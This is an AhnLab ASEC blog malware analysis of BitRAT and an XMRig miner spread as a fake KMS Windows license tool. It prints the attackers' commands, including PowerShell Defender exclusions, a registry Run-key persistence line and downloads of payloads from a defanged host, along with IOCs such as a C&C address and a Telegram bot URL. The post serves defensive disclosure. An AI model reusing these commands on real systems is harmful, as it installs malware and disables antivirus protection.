BitRAT and XMRig CoinMiner Being Distributed via Windows License Verification Tool – ASEC BLOG

The ASEC analysis team has recently discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool. As introduced in previous posts, BitRAT has a history of being distributed on webhards as MS Windows license verification tools and MS Office installation programs. It is likely that the case covered by this post is being done by the same attacker. One thing to note is that a BitRAT remote control tool is installed in the environment without V3 installed, and when V3 is present, a CoinMiner unrelated to BitRAT is installed.

The initial distribution case cannot be found, but the malware has currently been uploaded as a compressed file disguised as a KMS Windows license verification tool on a file hosting website called MediaFire.

Figure 1. Malware uploaded to MediaFire

This download URL is being shared to various Korean community websites (see Figures below).

Figure 2. Korean community forum post – 1
Figure 3. Korean community forum post – 2

Upon decompressing the downloaded file, the following files can be found. One of the files named “KMS Tools Unpack.exe” is disguised as malware. “KMS Tools Unpack.exe” is a 7z SFX, in other words, a compressed executable file.

Figure 4. Malware inside the compressed file

Similar to other compressors, 7z supports SFX formats. Upon compressing a file using this format, .exe executable is created instead of .zip or .z compressed file. This is often used as an installer because of its convenience, such as its ability to let the creator install programs to the path of their choice simply by running the executable. Not only does 7z SFX allow the installation of the included files, but also has an additional feature. If this feature is used, a specific command can be executed during the installation process.

Different from other malware installers, the actual malware does not exist inside the file. There is instead only a KMS tool inside. However, the following malicious commands are executed during the installation process which causes it to also download additional malware. The commands include a command that adds the installation path of the malware as an exception so that Windows Defender does not scan it for malware and another command that downloads the additional malware externally.

Figure 5. Malicious commands executed when 7z SFX is run

The powershell command makes it appear as if the MSI format malware, “KMS.msi”, will be downloaded and executed, but the downloaded malware is actually an executable. When “KMS.msi” is run as a downloader, it has an Anti VM and Anti Sandbox feature that scans to see if the process “vmtoolsd” and “asdmon” are active. If they are, it does not download additional malware.

It then uses the following commands to exclude the malware’s download path and process from scanning.

> powershell.exe "-Command 
  Add-MpPreference -ExclusionPath 'C:Users[User Name]AppDataLocalTemp'; 
  Add-MpPreference -ExclusionPath 'C:Users[User Name]AppDataLocalGooglesoftware_reporter_tool.exe'; 
  Add-MpPreference -ExclusionProcess 'InstallUtil.exe'; 
  Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe'; 
  Add-MpPreference -ExclusionProcess 'svchost.exe'; 
  Add-MpPreference -ExclusionPath 'C:Users[User Name]AppDataLocalMicrosoftWindowsINetCacheIE'"

The downloaded malware is saved in the path “%LOCALAPPDATA%Googlesoftware_reporter_tool.exe”, and the path is registered under a RUN key to run even after rebooting.

> cmd.exe "/c reg add HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun /v Google /t REG_SZ /d C:Users[User Name]AppDataLocalGooglesoftware_reporter_tool.exe /f"

“KMS.msi” has another characteristic: Malware installed in user PC differs by whether their environment has V3 installed or not. V3 installation is decided after checking whether the process “ASDSvc” is running.

Figure 6. Branch determined depending on the presence of V3 anti-malware product

In the path “%LOCALAPPDATA%Googlesoftware_reporter_tool.exe”, “obieznne.msi” is installed if V3 is present, and “wniavctm.msi” is installed if V3 is not present. The executed malware runs while disguised as a Google Chrome browser update which makes it difficult for regular users to notice the suspicious process.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/obieznne.msi -OutFile C:Users[User Name]AppDataLocalGooglesoftware_reporter_tool.exe"
> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/wniavctm.msi -OutFile C:Users[User Name]AppDataLocalGooglesoftware_reporter_tool.exe"

After reaching this point, “KMS_Tool.msi” installs a file. We could not check the file since the download is currently not possible, but it is likely to be a KMS tool.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/KMS_Tool.msi -OutFile C:Users[User Name]AppDataLocalTempzxoeqxat.msi; cmd /c C:Users[User Name]AppDataLocalTempzxoeqxat.msi"

Even if a KMS tool is not installed, the “KMS Tools Unpack.exe” that was launched will be deleted and replaced by a KMS tool called “KMSTools.exe” with the same icon. It is unlikely that a user will notice that they were infected by malware because they will be able to use the newly generated KMS tool.

Figure 7. KMS tool generated when malware is executed

Lastly, a telegram API is used to send the infected system’s basic information before deleting itself.

Figure 8. Network connection of malware
  • Telegram API used to send infected system information: hxxps://api.telegram[.]org/bot5538205016:AAH7S9IGtFpb6RbC8W2TfNkjD7Cj_3qxCnI/sendMessage

The installation of other malware can be confirmed according to whether V3 is installed or not. After “obieznne.msi” is installed when no V3 is present, it will launch its normal program InstallUtil.exe as an injector malware before injecting the actual BitRAT. BitRAT will disguise itself as a normal process by operating within the InstallUtil process memory.

BitRAT is a RAT malware that provides various features to attackers if installed. Not only does it provide basic control features such as running process tasks, service tasks, file tasks, and remote commands, but also extra options such as various info-stealing features, HVNC, remote desktop, coin mining, and proxies.

Figure 9. BitRAT C&C Communication

A XMRig CoinMiner is installed instead of a BitRAT in environments where V3 is present. XMRig operates under the memory of svchost.exe, which is a normal program, so regular users may struggle to recognize the problem even if their computer becomes slow due to the mining.

Figure 10. XMRig CoinMiner
  • Mining Pool URL : asia.randomx-hub.miningpoolhub[.]com:20580
  • User : “coinzz88.test”
  • Pass : “”

As the malware is being distributed actively via Korean file-sharing websites, users need to take caution. As such, caution is advised when running executables downloaded from file-sharing websites. It is recommended to download products such as utility programs and games from their official websites. Users should apply the latest patch for OS and programs such as Internet browsers, and update V3 to the latest version to prevent malware infection in advance.

[File Detection]
– Downloader/Win.Agent.C5222945 (2022.08.14.00)
– Downloader/Win.MSIL.R510666 (2022.08.14.03)
– Trojan/Win.Generic.C5223158 (2022.08.14.02)
– CoinMiner/Win.XMRig.C5223211 (2022.08.15.00)

[Behavior Detection]
– Execution/MDP.Powershell.M1185
– Malware/MDP.Download.M1197
– Malware/MDP.DriveByDownload.M1298
– Execution/MDP.Powershell.M4192

[IOC]
MD5

– 74120cfeca3b003c6dbf81707216c22c (Installer – KMS Tools Unpack.exe)
– ce985a31420169f002706fb46d5e8cd0 (Downloader – KMS.msi)
– d6cb1c1dd51917214ff41b76e904769e (BitRAT – obieznne.msi)
– 4e5cb75c3c99f30c7a22b940fd107505 (XMRig CoinMiner – wniavctm.msi)

Download URL
– hxxp://purposedesigns[.]net:443/KMS.msi (Downloader)
– hxxp://purposedesigns[.]net:443/obieznne.msi (BitRAT)
– hxxp://purposedesigns[.]net:443/wniavctm.msi (XMRig CoinMiner)

C&C
– 147.189.161[.]248:80 (BitRAT)

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/37939/